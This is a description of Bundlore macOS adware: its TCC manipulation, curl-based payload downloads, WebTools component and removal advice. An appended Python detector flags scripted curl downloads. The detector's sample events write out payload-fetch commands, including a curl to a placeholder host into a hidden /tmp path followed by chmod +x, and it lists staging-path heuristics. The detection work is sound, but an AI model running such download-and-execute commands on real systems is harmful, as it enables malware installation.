Bundlore is a type of malware that has been particularly active and on the rise since 2019, specifically targeting macOS systems. It is designed to manipulate the Transparency, Consent, and Control (TCC) framework, a macOS privacy-protection mechanism; this TCC-manipulation behaviour is shared with other notable malware tools such as BlueBlood, Callisto, JokerSpy, XCSSET, and others recorded on VirusTotal. Bundlore, along with other adware families like CoinTicker and Shlayer, uses the built-in utility 'curl' to download its payload onto the targeted system. The malware is often propagated through suspicious downloads, emails, or websites, infecting systems without the user's knowledge.
In the most recent versions, Bundlore incorporates a component known as WebTools, which bypasses macOS security measures, alters browser behavior, achieves persistence, and installs an ad delivery component. This version consolidates the functionality into a single application, instead of the multiple binaries and bash scripts used in previous iterations. Despite macOS's robust security mechanisms, Bundlore has developed methods to circumvent these protections, posing a significant threat to the integrity of infected systems.
To combat Bundlore infections, users are advised to employ reliable anti-malware solutions. One such solution is MacKeeper, which has been confirmed to effectively remove Bundlore components, with the exception of any System Integrity Protection (SIP)-protected files, which SIP prevents from being modified. If a system is suspected to be infected with Bundlore, further research can be conducted using a list of Indicators of Compromise (IoCs), helping to identify and eliminate the threat.
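As an added illustration of the detection angle this description implies (example code written for this page, not part of the original text or of any vendor tool mentioned above): a small Python scan over constructed process-execution events that flags curl invocations which write a download to a temporary or hidden path, are launched by a script or installer parent, or fetch from a host on an IoC list. The event format, the parent-process set, the staging directories and the IoC host are all assumptions chosen for the example; the IoC host is a labelled placeholder, not a real indicator.

```python
import re
import shlex
from urllib.parse import urlparse

# Constructed sample of process-execution events (not real telemetry).
# Assumed format: "<timestamp> parent=<name> pid=<n> cmd=<command line>"
SAMPLE_EVENTS = [
    '2024-10-21T08:00:01Z parent=bash pid=4101 cmd=curl -s -o /tmp/.upd/payload http://ioc-placeholder.example/pkg.bin',
    '2024-10-21T08:00:02Z parent=bash pid=4102 cmd=chmod +x /tmp/.upd/payload',
    '2024-10-21T08:05:10Z parent=Terminal pid=4201 cmd=curl -I https://www.apple.com',
    '2024-10-21T08:06:00Z parent=Installer pid=4300 cmd=curl -fsSL https://cdn.example.net/installer.sh -o /Users/Shared/.x/run.sh',
    '2024-10-21T08:07:00Z parent=zsh pid=4400 cmd=ls -la',
]

# Placeholder IoC host list; a real list would come from a published IoC report.
IOC_HOSTS = {"ioc-placeholder.example"}

# Heuristic settings (assumptions for this example, tune to your environment):
# directories commonly used to stage a downloaded payload, and parent processes
# that indicate curl was driven by a script or installer rather than a user.
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
SCRIPT_PARENTS = {"bash", "sh", "zsh", "Installer", "osascript"}

EVENT_RE = re.compile(r"^(?P<ts>\S+) parent=(?P<parent>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$")


def parse_event(line):
    """Parse one event line into a dict, or return None if it does not match."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def curl_download_info(cmd):
    """For a curl command line return (url, output_path); None if cmd is not curl.

    output_path is None when curl would write to stdout, and the marker
    "<remote-name>" when -O/--remote-name derives the file name from the URL.
    """
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    url, out = None, None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-o", "--output") and i + 1 < len(argv):
            out = argv[i + 1]
            i += 2
            continue
        if arg in ("-O", "--remote-name"):
            out = "<remote-name>"
        elif not arg.startswith("-") and ("://" in arg or arg.startswith("www.")):
            url = arg
        i += 1
    return url, out


def assess(event):
    """Return the list of reasons an event looks like a scripted payload download."""
    reasons = []
    info = curl_download_info(event["cmd"])
    if info is None:
        return reasons
    url, out = info
    host = urlparse(url).hostname if url else None
    if host in IOC_HOSTS:
        reasons.append(f"host matches IoC list: {host}")
    if out and out.startswith(SUSPICIOUS_DIRS):
        reasons.append(f"payload written to staging directory: {out}")
    if out and any(part.startswith(".") for part in out.split("/") if part):
        reasons.append(f"payload written under a hidden path: {out}")
    if out and event["parent"] in SCRIPT_PARENTS:
        reasons.append(f"download driven by script/installer parent: {event['parent']}")
    return reasons


def scan(lines):
    """Scan event lines; return one finding per event that triggered any heuristic."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        reasons = assess(event)
        if reasons:
            findings.append({"pid": event["pid"], "cmd": event["cmd"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"pid {finding['pid']}: {finding['cmd']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

A plain interactive `curl -I` to a well-known site produces no finding, while the two scripted downloads into hidden staging paths are reported with every heuristic that fired; in practice the IoC host set is the part you would replace with the published indicator list, and the path and parent heuristics catch behaviour that an indicator list alone would miss.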
Description last updated: 2024-10-21T08:37:26.489Z